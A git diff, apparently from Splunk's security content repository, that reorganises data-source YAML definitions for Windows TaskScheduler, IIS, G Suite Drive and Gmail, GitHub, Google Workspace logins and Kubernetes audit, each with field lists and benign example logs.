@@ -1,61 +0,0 @@
-event_name: Windows Event Log TaskScheduler 200
-fields:
-- _time
-- ActionName
-- ActivityID
-- Channel
-- Computer
-- EnginePID
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- TaskInstanceId
-- TaskName
-- ThreadID
-- UserID
-- Version
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-TaskScheduler' Guid='{DE7B24EA-73C8-4A09-985D-5BDADCFA9017}'/><EventID>200</EventID><Version>1</Version><Level>4</Level><Task>200</Task><Opcode>1</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2024-03-04T03:52:18.856458200Z'/><EventRecordID>4323</EventRecordID><Correlation ActivityID='{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}'/><Execution ProcessID='988' ThreadID='4524'/><Channel>Microsoft-Windows-TaskScheduler/Operational</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData Name='ActionStart'><Data Name='TaskName'>\OneLinerTestTask3</Data><Data Name='ActionName'>notepad.exe</Data><Data Name='TaskInstanceId'>{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}</Data><Data Name='EnginePID'>536</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_IIS_29.yml b/data_sources/endpoint/event_sources/Windows_IIS_29.yml
deleted file mode 100644
index bd3bef5750..0000000000
--- a/data_sources/endpoint/event_sources/Windows_IIS_29.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-event_name: Windows IIS 29
-fields:
-- _time
-- ComputerName
-- EventCode
-- EventType
-- Keywords
-- LogName
-- Message
-- OpCode
-- RecordNumber
-- Sid
-- SidType
-- SourceName
-- TaskCategory
-- Type
-- User
-- name
-example_log: ''
diff --git a/data_sources/cloud/G_Suite_Drive.yml b/data_sources/g_suite_drive.yml
similarity index 53%
rename from data_sources/cloud/G_Suite_Drive.yml
rename to data_sources/g_suite_drive.yml
index affd766fee..1d32fab60e 100644
--- a/data_sources/cloud/G_Suite_Drive.yml
+++ b/data_sources/g_suite_drive.yml
@@ -1,47 +1,48 @@
 name: G Suite Drive
 id: 5f79120f-a235-4468-bd0d-55203758ac22
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for G Suite Drive
 source: http:gsuite
 sourcetype: gsuite:drive:json
 supported_TA:
-  name: Splunk Add-on for Google Workspace
-  version: 2.6.3
+- name: Splunk Add-on for Google Workspace
   url: https://splunkbase.splunk.com/app/5556
-event_names: []
+  version: 2.6.3
 fields:
-  - _time
-  - email
-  - host
-  - index
-  - ip_address
-  - linecount
-  - name
-  - parameters.actor_is_collaborator_account
-  - parameters.billable
-  - parameters.doc_id
-  - parameters.doc_title
-  - parameters.doc_type
-  - parameters.is_encrypted
-  - parameters.new_value{}
-  - parameters.old_value{}
-  - parameters.old_visibility
-  - parameters.originating_app_id
-  - parameters.owner
-  - parameters.owner_is_shared_drive
-  - parameters.owner_is_team_drive
-  - parameters.primary_event
-  - parameters.target_user
-  - parameters.visibility
-  - parameters.visibility_change
-  - punct
-  - source
-  - sourcetype
-  - splunk_server
-  - timestamp
-  - type
-  - unique_id
-example_log:
-  '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
+- _time
+- email
+- host
+- index
+- ip_address
+- linecount
+- name
+- parameters.actor_is_collaborator_account
+- parameters.billable
+- parameters.doc_id
+- parameters.doc_title
+- parameters.doc_type
+- parameters.is_encrypted
+- parameters.new_value{}
+- parameters.old_value{}
+- parameters.old_visibility
+- parameters.originating_app_id
+- parameters.owner
+- parameters.owner_is_shared_drive
+- parameters.owner_is_team_drive
+- parameters.primary_event
+- parameters.target_user
+- parameters.visibility
+- parameters.visibility_change
+- punct
+- source
+- sourcetype
+- splunk_server
+- timestamp
+- type
+- unique_id
+example_log: '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
   true, "billable": true, "visibility_change": "none", "target_user": "alberto@internal_test_email.com",
   "old_value": ["none"], "new_value": ["can_edit"], "old_visibility": "private", "doc_id":
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "doc_type": "spreadsheet", "is_encrypted":
diff --git a/data_sources/cloud/G_Suite_Gmail.yml b/data_sources/g_suite_gmail.yml
similarity index 54%
rename from data_sources/cloud/G_Suite_Gmail.yml
rename to data_sources/g_suite_gmail.yml
index adfcde6794..3249163deb 100644
--- a/data_sources/cloud/G_Suite_Gmail.yml
+++ b/data_sources/g_suite_gmail.yml
@@ -1,86 +1,87 @@
 name: G Suite Gmail
 id: 706c3978-41de-406b-b6e0-75bd01e12a5d
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for G Suite Gmail
 source: http:gsuite
 sourcetype: gsuite:gmail:bigquery
 supported_TA:
-  name: Splunk Add-on for Google Workspace
-  version: 2.6.3
+- name: Splunk Add-on for Google Workspace
   url: https://splunkbase.splunk.com/app/5556
-event_names: []
+  version: 2.6.3
 fields:
-  - _time
-  - action_type
-  - attachment{}.file_extension_type
-  - attachment{}.malware_family
-  - attachment{}.sha256
-  - connection_info.authenticated_domain{}.name
-  - connection_info.authenticated_domain{}.type
-  - connection_info.client_host_zone
-  - connection_info.client_ip
-  - connection_info.dkim_pass
-  - connection_info.dmarc_pass
-  - connection_info.dmarc_published_domain
-  - connection_info.ip_geo_city
-  - connection_info.ip_geo_country
-  - connection_info.is_internal
-  - connection_info.is_intra_domain
-  - connection_info.smtp_in_connect_ip
-  - connection_info.smtp_out_connect_ip
-  - connection_info.smtp_out_remote_host
-  - connection_info.smtp_reply_code
-  - connection_info.smtp_response_reason
-  - connection_info.smtp_tls_cipher
-  - connection_info.smtp_tls_state
-  - connection_info.smtp_tls_version
-  - connection_info.smtp_user_agent_ip
-  - connection_info.spf_pass
-  - connection_info.tls_required_but_unavailable
-  - description
-  - destination{}.address
-  - destination{}.rcpt_response
-  - destination{}.selector
-  - destination{}.service
-  - destination{}.smime_decryption_success
-  - destination{}.smime_extraction_success
-  - destination{}.smime_parsing_success
-  - destination{}.smime_signature_verification_success
-  - eventtype
-  - flattened_destinations
-  - flattened_triggered_rule_info
-  - host
-  - index
-  - is_policy_check_for_sender
-  - is_spam
-  - linecount
-  - message_set{}.type
-  - num_message_attachments
-  - payload_size
-  - punct
-  - rfc2822_message_id
-  - smime_content_type
-  - smime_encrypt_message
-  - smime_extraction_success
-  - smime_packaging_success
-  - smime_sign_message
-  - smtp_relay_error
-  - source
-  - source.address
-  - source.from_header_address
-  - source.from_header_displayname
-  - source.selector
-  - source.service
-  - sourcetype
-  - spam_info
-  - splunk_server
-  - structured_policy_log_info
-  - subject
-  - tag
-  - tag::eventtype
-  - timestamp
-  - upload_error_category
-example_log:
-  '{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
+- _time
+- action_type
+- attachment{}.file_extension_type
+- attachment{}.malware_family
+- attachment{}.sha256
+- connection_info.authenticated_domain{}.name
+- connection_info.authenticated_domain{}.type
+- connection_info.client_host_zone
+- connection_info.client_ip
+- connection_info.dkim_pass
+- connection_info.dmarc_pass
+- connection_info.dmarc_published_domain
+- connection_info.ip_geo_city
+- connection_info.ip_geo_country
+- connection_info.is_internal
+- connection_info.is_intra_domain
+- connection_info.smtp_in_connect_ip
+- connection_info.smtp_out_connect_ip
+- connection_info.smtp_out_remote_host
+- connection_info.smtp_reply_code
+- connection_info.smtp_response_reason
+- connection_info.smtp_tls_cipher
+- connection_info.smtp_tls_state
+- connection_info.smtp_tls_version
+- connection_info.smtp_user_agent_ip
+- connection_info.spf_pass
+- connection_info.tls_required_but_unavailable
+- description
+- destination{}.address
+- destination{}.rcpt_response
+- destination{}.selector
+- destination{}.service
+- destination{}.smime_decryption_success
+- destination{}.smime_extraction_success
+- destination{}.smime_parsing_success
+- destination{}.smime_signature_verification_success
+- eventtype
+- flattened_destinations
+- flattened_triggered_rule_info
+- host
+- index
+- is_policy_check_for_sender
+- is_spam
+- linecount
+- message_set{}.type
+- num_message_attachments
+- payload_size
+- punct
+- rfc2822_message_id
+- smime_content_type
+- smime_encrypt_message
+- smime_extraction_success
+- smime_packaging_success
+- smime_sign_message
+- smtp_relay_error
+- source
+- source.address
+- source.from_header_address
+- source.from_header_displayname
+- source.selector
+- source.service
+- sourcetype
+- spam_info
+- splunk_server
+- structured_policy_log_info
+- subject
+- tag
+- tag::eventtype
+- timestamp
+- upload_error_category
+example_log: '{"action_type": 10, "rfc2822_message_id": "<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC@mail.gmail.com>",
   "subject": "New Order DHL0000001 - Dummy email for Detection Development", "payload_size":
   6733, "source": {"address": "john@external_test_email.com", "service": "gmail-for-work",
   "selector": "policy", "from_header_address": "john@external_test_email.com", "from_header_displayname":
diff --git a/data_sources/github.yml b/data_sources/github.yml
new file mode 100644
index 0000000000..0b5fd01c40
--- /dev/null
+++ b/data_sources/github.yml
@@ -0,0 +1,206 @@
+name: GitHub
+id: 88aa4632-3c3e-43f6-a00a-998d71f558e3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for GitHub
+source: github
+sourcetype: aws:firehose:json
+supported_TA:
+- name: Splunk Add-on for Github
+  url: https://splunkbase.splunk.com/app/6254
+  version: 2.2.1
+fields:
+- _time
+- action
+- host
+- index
+- linecount
+- meta
+- punct
+- source
+- sourcetype
+- splunk_server
+- timestamp
+- workflow_run.actor.avatar_url
+- workflow_run.actor.events_url
+- workflow_run.actor.followers_url
+- workflow_run.actor.following_url
+- workflow_run.actor.gists_url
+- workflow_run.actor.gravatar_id
+- workflow_run.actor.html_url
+- workflow_run.actor.id
+- workflow_run.actor.login
+- workflow_run.actor.node_id
+- workflow_run.actor.organizations_url
+- workflow_run.actor.received_events_url
+- workflow_run.actor.repos_url
+- workflow_run.actor.site_admin
+- workflow_run.actor.starred_url
+- workflow_run.actor.subscriptions_url
+- workflow_run.actor.type
+- workflow_run.actor.url
+- workflow_run.artifacts_url
+- workflow_run.cancel_url
+- workflow_run.check_suite_id
+- workflow_run.check_suite_node_id
+- workflow_run.check_suite_url
+- workflow_run.conclusion
+- workflow_run.created_at
+- workflow_run.event
+- workflow_run.head_branch
+- workflow_run.head_commit.author.email
+- workflow_run.head_commit.author.name
+- workflow_run.head_commit.committer.email
+- workflow_run.head_commit.committer.name
+- workflow_run.head_commit.id
+- workflow_run.head_commit.message
+- workflow_run.head_commit.timestamp
+- workflow_run.head_commit.tree_id
+- workflow_run.head_repository.collaborators_url
+- workflow_run.head_repository.description
+- workflow_run.head_repository.fork
+- workflow_run.head_repository.forks_url
+- workflow_run.head_repository.full_name
+- workflow_run.head_repository.hooks_url
+- workflow_run.head_repository.html_url
+- workflow_run.head_repository.id
+- workflow_run.head_repository.keys_url
+- workflow_run.head_repository.name
+- workflow_run.head_repository.node_id
+- workflow_run.head_repository.owner.avatar_url
+- workflow_run.head_repository.owner.events_url
+- workflow_run.head_repository.owner.followers_url
+- workflow_run.head_repository.owner.following_url
+- workflow_run.head_repository.owner.gists_url
+- workflow_run.head_repository.owner.gravatar_id
+- workflow_run.head_repository.owner.html_url
+- workflow_run.head_repository.owner.id
+- workflow_run.head_repository.owner.login
+- workflow_run.head_repository.owner.node_id
+- workflow_run.head_repository.owner.organizations_url
+- workflow_run.head_repository.owner.received_events_url
+- workflow_run.head_repository.owner.repos_url
+- workflow_run.head_repository.owner.site_admin
+- workflow_run.head_repository.owner.starred_url
+- workflow_run.head_repository.owner.subscriptions_url
+- workflow_run.head_repository.owner.type
+- workflow_run.head_repository.owner.url
+- workflow_run.head_repository.private
+- workflow_run.head_repository.teams_url
+- workflow_run.head_repository.url
+- workflow_run.head_sha
+- workflow_run.html_url
+- workflow_run.id
+- workflow_run.jobs_url
+- workflow_run.logs_url
+- workflow_run.name
+- workflow_run.node_id
+- workflow_run.previous_attempt_url
+- workflow_run.pull_requests{}.base.ref
+- workflow_run.pull_requests{}.base.repo.id
+- workflow_run.pull_requests{}.base.repo.name
+- workflow_run.pull_requests{}.base.repo.url
+- workflow_run.pull_requests{}.base.sha
+- workflow_run.pull_requests{}.head.ref
+- workflow_run.pull_requests{}.head.repo.id
+- workflow_run.pull_requests{}.head.repo.name
+- workflow_run.pull_requests{}.head.repo.url
+- workflow_run.pull_requests{}.head.sha
+- workflow_run.pull_requests{}.id
+- workflow_run.pull_requests{}.number
+- workflow_run.pull_requests{}.url
+- workflow_run.repository.archive_url
+- workflow_run.repository.assignees_url
+- workflow_run.repository.blobs_url
+- workflow_run.repository.branches_url
+- workflow_run.repository.collaborators_url
+- workflow_run.repository.comments_url
+- workflow_run.repository.commits_url
+- workflow_run.repository.compare_url
+- workflow_run.repository.contents_url
+- workflow_run.repository.contributors_url
+- workflow_run.repository.deployments_url
+- workflow_run.repository.description
+- workflow_run.repository.downloads_url
+- workflow_run.repository.events_url
+- workflow_run.repository.fork
+- workflow_run.repository.forks_url
+- workflow_run.repository.full_name
+- workflow_run.repository.git_commits_url
+- workflow_run.repository.git_refs_url
+- workflow_run.repository.git_tags_url
+- workflow_run.repository.hooks_url
+- workflow_run.repository.html_url
+- workflow_run.repository.id
+- workflow_run.repository.issue_comment_url
+- workflow_run.repository.issue_events_url
+- workflow_run.repository.issues_url
+- workflow_run.repository.keys_url
+- workflow_run.repository.labels_url
+- workflow_run.repository.languages_url
+- workflow_run.repository.merges_url
+- workflow_run.repository.milestones_url
+- workflow_run.repository.name
+- workflow_run.repository.node_id
+- workflow_run.repository.notifications_url
+- workflow_run.repository.owner.avatar_url
+- workflow_run.repository.owner.events_url
+- workflow_run.repository.owner.followers_url
+- workflow_run.repository.owner.following_url
+- workflow_run.repository.owner.gists_url
+- workflow_run.repository.owner.gravatar_id
+- workflow_run.repository.owner.html_url
+- workflow_run.repository.owner.id
+- workflow_run.repository.owner.login
+- workflow_run.repository.owner.node_id
+- workflow_run.repository.owner.organizations_url
+- workflow_run.repository.owner.received_events_url
+- workflow_run.repository.owner.repos_url
+- workflow_run.repository.owner.site_admin
+- workflow_run.repository.owner.starred_url
+- workflow_run.repository.owner.subscriptions_url
+- workflow_run.repository.owner.type
+- workflow_run.repository.owner.url
+- workflow_run.repository.private
+- workflow_run.repository.pulls_url
+- workflow_run.repository.releases_url
+- workflow_run.repository.stargazers_url
+- workflow_run.repository.statuses_url
+- workflow_run.repository.subscribers_url
+- workflow_run.repository.subscription_url
+- workflow_run.repository.tags_url
+- workflow_run.repository.teams_url
+- workflow_run.repository.trees_url
+- workflow_run.repository.url
+- workflow_run.rerun_url
+- workflow_run.run_attempt
+- workflow_run.run_number
+- workflow_run.run_started_at
+- workflow_run.status
+- workflow_run.triggering_actor.avatar_url
+- workflow_run.triggering_actor.events_url
+- workflow_run.triggering_actor.followers_url
+- workflow_run.triggering_actor.following_url
+- workflow_run.triggering_actor.gists_url
+- workflow_run.triggering_actor.gravatar_id
+- workflow_run.triggering_actor.html_url
+- workflow_run.triggering_actor.id
+- workflow_run.triggering_actor.login
+- workflow_run.triggering_actor.node_id
+- workflow_run.triggering_actor.organizations_url
+- workflow_run.triggering_actor.received_events_url
+- workflow_run.triggering_actor.repos_url
+- workflow_run.triggering_actor.site_admin
+- workflow_run.triggering_actor.starred_url
+- workflow_run.triggering_actor.subscriptions_url
+- workflow_run.triggering_actor.type
+- workflow_run.triggering_actor.url
+- workflow_run.updated_at
+- workflow_run.url
+- workflow_run.workflow_id
+- workflow_run.workflow_url
+example_log: '{"action":"requested","workflow_run":{"id":2088708615,"name":"auto-update","node_id":"WFR_kwLOCa00Ec58fyoH","head_branch":"mac_os_detections","head_sha":"4049334910ea3d52a917ca35aed66d11c80ed966","run_number":9504,"event":"push","status":"queued","conclusion":null,"workflow_id":4692335,"check_suite_id":5918781611,"check_suite_node_id":"CS_kwDOCa00Ec8AAAABYMlwqw","url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615","html_url":"https://github.com/splunk/security_content/actions/runs/2088708615","pull_requests":[{"url":"https://api.github.com/repos/splunk/security_content/pulls/2131","id":893091277,"number":2131,"head":{"ref":"mac_os_detections","sha":"4049334910ea3d52a917ca35aed66d11c80ed966","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}},"base":{"ref":"develop","sha":"a7d3d1dc57f9bf36fe22e470bcf518fcc2c89283","repo":{"id":162346001,"url":"https://api.github.com/repos/splunk/security_content","name":"security_content"}}}],"created_at":"2022-04-04T08:43:15Z","updated_at":"2022-04-04T08:43:15Z","actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"run_attempt":1,"run_started_at":"2022-04-04T08:43:15Z","triggering_actor":{"login":"jsmith","id":8362376,"node_id":"MDQ6VXNlcjgzNjIzNzY=","avatar_url":"https://avatars.githubusercontent.com/u/8362376?v=4","gravatar_id":"","url":"https://api.github.com/users/jsmith","html_url":"https://github.com/jsmith","followers_url":"https://api.github.com/users/jsmith/followers","following_url":"https://api.github.com/users/jsmith/following{/other_user}","gists_url":"https://api.github.com/users/jsmith/gists{/gist_id}","starred_url":"https://api.github.com/users/jsmith/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/jsmith/subscriptions","organizations_url":"https://api.github.com/users/jsmith/orgs","repos_url":"https://api.github.com/users/jsmith/repos","events_url":"https://api.github.com/users/jsmith/events{/privacy}","received_events_url":"https://api.github.com/users/jsmith/received_events","type":"User","site_admin":false},"jobs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/jobs","logs_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/logs","check_suite_url":"https://api.github.com/repos/splunk/security_content/check-suites/5918781611","artifacts_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/artifacts","cancel_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/cancel","rerun_url":"https://api.github.com/repos/splunk/security_content/actions/runs/2088708615/rerun","previous_attempt_url":null,"workflow_url":"https://api.github.com/repos/splunk/security_content/actions/workflows/4692335","head_commit":{"id":"4049334910ea3d52a917ca35aed66d11c80ed966","tree_id":"df4ddc1359be3b19f093b7a27dbf5708187743a0","message":"small
+  change","timestamp":"2022-04-04T08:43:01Z","author":{"name":"jsmith","email":"jsmith@evilcorp.com"},"committer":{"name":"jsmith","email":"jsmith@evilcorp.com"}},"repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
+  Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/number}","events_url":"https://api.github.com/repos/splunk/security_content/events","assignees_url":"https://api.github.com/repos/splunk/security_content/assignees{/user}","branches_url":"https://api.github.com/repos/splunk/security_content/branches{/branch}","tags_url":"https://api.github.com/repos/splunk/security_content/tags","blobs_url":"https://api.github.com/repos/splunk/security_content/git/blobs{/sha}","git_tags_url":"https://api.github.com/repos/splunk/security_content/git/tags{/sha}","git_refs_url":"https://api.github.com/repos/splunk/security_content/git/refs{/sha}","trees_url":"https://api.github.com/repos/splunk/security_content/git/trees{/sha}","statuses_url":"https://api.github.com/repos/splunk/security_content/statuses/{sha}","languages_url":"https://api.github.com/repos/splunk/security_content/languages","stargazers_url":"https://api.github.com/repos/splunk/security_content/stargazers","contributors_url":"https://api.github.com/repos/splunk/security_content/contributors","subscribers_url":"https://api.github.com/repos/splunk/security_content/subscribers","subscription_url":"https://api.github.com/repos/splunk/security_content/subscription","commits_url":"https://api.github.com/repos/splunk/security_content/commits{/sha}","git_commits_url":"https://api.github.com/repos/splunk/security_content/git/commits{/sha}","comments_url":"https://api.github.com/repos/splunk/security_content/comments{/number}","issue_comment_url":"https://api.github.com/repos/splunk/security_content/issues/comments{/number}","contents_url":"https://api.github.com/repos/splunk/security_content/contents/{+path}","compare_url":"https://api.github.com/repos/splunk/security_content/compare/{base}...{head}","merges_url":"https://api.github.com/repos/splunk/security_content/merges","archive_url":"https://api.github.com/repos/splunk/security_content/{archive_format}{/ref}","downloads_url":"https://api.github.com/repos/splunk/security_content/downloads","issues_url":"https://api.github.com/repos/splunk/security_content/issues{/number}","pulls_url":"https://api.github.com/repos/splunk/security_content/pulls{/number}","milestones_url":"https://api.github.com/repos/splunk/security_content/milestones{/number}","notifications_url":"https://api.github.com/repos/splunk/security_content/notifications{?since,all,participating}","labels_url":"https://api.github.com/repos/splunk/security_content/labels{/name}","releases_url":"https://api.github.com/repos/splunk/security_content/releases{/id}","deployments_url":"https://api.github.com/repos/splunk/security_content/deployments"},"head_repository":{"id":162346001,"node_id":"MDEwOlJlcG9zaXRvcnkxNjIzNDYwMDE=","name":"security_content","full_name":"splunk/security_content","private":false,"owner":{"login":"splunk","id":651467,"node_id":"MDEyOk9yZ2FuaXphdGlvbjY1MTQ2Nw==","avatar_url":"https://avatars.githubusercontent.com/u/651467?v=4","gravatar_id":"","url":"https://api.github.com/users/splunk","html_url":"https://github.com/splunk","followers_url":"https://api.github.com/users/splunk/followers","following_url":"https://api.github.com/users/splunk/following{/other_user}","gists_url":"https://api.github.com/users/splunk/gists{/gist_id}","starred_url":"https://api.github.com/users/splunk/starred{/owner}{/repo}","subscriptions_url":"https://api.github.com/users/splunk/subscriptions","organizations_url":"https://api.github.com/users/splunk/orgs","repos_url":"https://api.github.com/users/splunk/repos","events_url":"https://api.github.com/users/splunk/events{/privacy}","received_events_url":"https://api.github.com/users/splunk/received_events","type":"Organization","site_admin":false},"html_url":"https://github.com/splunk/security_content","description":"Splunk
+  Security Content","fork":false,"url":"https://api.github.com/repos/splunk/security_content","forks_url":"https://api.github.com/repos/splunk/security_content/forks","keys_url":"https://api.github.com/repos/splunk/security_content/keys{/key_id}","collaborators_url":"https://api.github.com/repos/splunk/security_content/collaborators{/collaborator}","teams_url":"https://api.github.com/repos/splunk/security_content/teams","hooks_url":"https://api.github.com/repos/splunk/security_content/hooks","issue_events_url":"https://api.github.com/repos/splunk/security_content/issues/events{/num'
diff --git a/data_sources/google_workspace_login_failure.yml b/data_sources/google_workspace_login_failure.yml
new file mode 100644
index 0000000000..575f5de469
--- /dev/null
+++ b/data_sources/google_workspace_login_failure.yml
@@ -0,0 +1,56 @@
+name: Google Workspace login_failure
+id: cabec7cf-4008-4899-b47e-39c34a9a1255
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Google Workspace login_failure
+source: gws:reports:admin
+sourcetype: gws:reports:admin
+separator: event.name
+supported_TA:
+- name: Splunk Add-on for Google Workspace
+  url: https://splunkbase.splunk.com/app/5556
+  version: 2.6.3
+fields:
+- _time
+- actor.email
+- actor.profileId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- etag
+- event.name
+- event.parameters{}.multiValue{}
+- event.parameters{}.name
+- event.parameters{}.value
+- event.type
+- eventtype
+- host
+- id.applicationName
+- id.customerId
+- id.time
+- id.uniqueQualifier
+- index
+- ipAddress
+- kind
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-12T01:05:35.119Z",
+  "uniqueQualifier": "720229394436", "applicationName": "login", "customerId": "C046r85ir"},
+  "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/_lixtTooT11WXorGf6w6ElN0m0g\"",
+  "actor": {"email": "user29@daftpunk.com", "profileId": "114679690119024644513"},
+  "ipAddress": "141.254.89.27", "event": {"type": "login", "name": "login_failure",
+  "parameters": [{"name": "login_type", "value": "unknown"}, {"name": "login_challenge_method",
+  "multiValue": ["password"]}]}}'
diff --git a/data_sources/google_workspace_login_success.yml b/data_sources/google_workspace_login_success.yml
new file mode 100644
index 0000000000..7a7d7f42f3
--- /dev/null
+++ b/data_sources/google_workspace_login_success.yml
@@ -0,0 +1,55 @@
+name: Google Workspace login_success
+id: bffe8013-9cdf-4fe6-9c1b-6784391a4951
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Google Workspace login_success
+source: gws:reports:admin
+sourcetype: gws:reports:admin
+separator: event.name
+supported_TA:
+- name: Splunk Add-on for Google Workspace
+  url: https://splunkbase.splunk.com/app/5556
+  version: 2.6.3
+fields:
+- _time
+- actor.email
+- actor.profileId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- etag
+- event.name
+- event.parameters{}.boolValue
+- event.parameters{}.multiValue{}
+- event.parameters{}.name
+- event.parameters{}.value
+- event.type
+- host
+- id.applicationName
+- id.customerId
+- id.time
+- id.uniqueQualifier
+- index
+- ipAddress
+- kind
+- linecount
+- punct
+- source
+- sourcetype
+- splunk_server
+- timeendpos
+- timestartpos
+example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-13T20:57:35.833Z",
+  "uniqueQualifier": "437744618349", "applicationName": "login", "customerId": "C046r85ir"},
+  "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/OgAbD-Tz8hSD1vUJWw7NLiJ5SF4\"",
+  "actor": {"email": "user1@splunkresearch.com", "profileId": "112184723778873345717"},
+  "ipAddress": "45.23.129.123", "event": {"type": "login", "name": "login_success",
+  "parameters": [{"name": "login_type", "value": "google_password"}, {"name": "login_challenge_method",
+  "multiValue": ["password", "password", "password", "password", "password"]}, {"name":
+  "is_suspicious", "boolValue": false}]}}'
diff --git a/data_sources/kubernetes_audit.yml b/data_sources/kubernetes_audit.yml
new file mode 100644
index 0000000000..acc709438e
--- /dev/null
+++ b/data_sources/kubernetes_audit.yml
@@ -0,0 +1,63 @@
+name: Kubernetes Audit
+id: 6c25181a-0c07-4aaf-90e6-77ab1f0e6699
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Kubernetes Audit
+source: kubernetes
+sourcetype: _json
+supported_TA:
+- {}
+fields:
+- _time
+- annotations.authorization.k8s.io/decision
+- annotations.authorization.k8s.io/reason
+- apiVersion
+- auditID
+- eventtype
+- host
+- index
+- kind
+- level
+- linecount
+- objectRef.apiGroup
+- objectRef.apiVersion
+- objectRef.namespace
+- objectRef.resource
+- punct
+- requestReceivedTimestamp
+- requestURI
+- responseObject.apiVersion
+- responseObject.code
+- responseObject.details.group
+- responseObject.details.kind
+- responseObject.kind
+- responseObject.message
+- responseObject.reason
+- responseObject.status
+- responseStatus.code
+- responseStatus.details.group
+- responseStatus.details.kind
+- responseStatus.message
+- responseStatus.reason
+- responseStatus.status
+- source
+- sourceIPs{}
+- sourcetype
+- splunk_server
+- stage
+- stageTimestamp
+- tag
+- tag::eventtype
+- timestamp
+- user.groups{}
+- user.uid
+- user.username
+- userAgent
+- verb
